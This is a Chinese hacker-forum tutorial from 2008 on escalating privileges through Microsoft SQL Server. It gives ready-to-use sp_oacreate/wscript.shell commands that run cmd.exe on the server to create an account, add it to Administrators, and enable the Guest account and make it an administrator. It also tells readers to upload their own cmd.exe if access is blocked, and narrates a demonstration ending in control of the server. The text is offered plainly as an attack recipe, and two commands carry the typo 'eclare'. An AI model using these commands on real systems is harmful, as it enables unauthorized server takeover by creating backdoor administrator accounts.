SQL提权演示

来源:黑客疯子 作者:順娸洎嘫 时间:2008-07-03 12:57 字体:[ ] 收藏 我要投稿

SQL提权演示

  首先想给大家了解一下SQL提权常用命令:
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名  --连接数据库。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'  --添加新用户。
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'  --把用户加到管理组

  如果以上添加管理员失败的时候,我们可以尝试激活Guest。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'  --激活GUEST用户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'  --把Guest加到管理组

  注意:如果c:\windows\system32\cmd.exe 被删除,没权限访问或者拒绝访问的话,我们可以自己上传个CMD上去,然后路径修改我们上传的CMD路径就可以了。

 

下面给大家演示一下整个SQL提权的过程:

默认GUEST用户密码为空禁用状态!

GUEST用户密码为空

激活GUEST用户

激活GUEST用户

激活GUEST用户成功,但是没有权限,所以我们继续把GUEST这个用户添加到管理组!

激活GUEST用户成功

把Guest加到管理组

把Guest加到管理组

成功把GUEST加到了管理组,成功进入了服务器!

成功进入了服务器

进去后能做些什么?相信这个就不用我罗嗦了。

原始出处:http://www.flhacker.cn
版权所有-转载时必须以链接形式注明原始出处

作者 黑客疯子 的个人空间 本文仅代表作者观点,与站长网立场无关.
0% (0)
0% (0)
编辑热线:0516-83818833 Email:0051@vip.163.com 20秒注册会员 结交站长朋友 分享你的精彩
站长评论(2)
评论加载中…
相关新闻

热门新闻

推荐新闻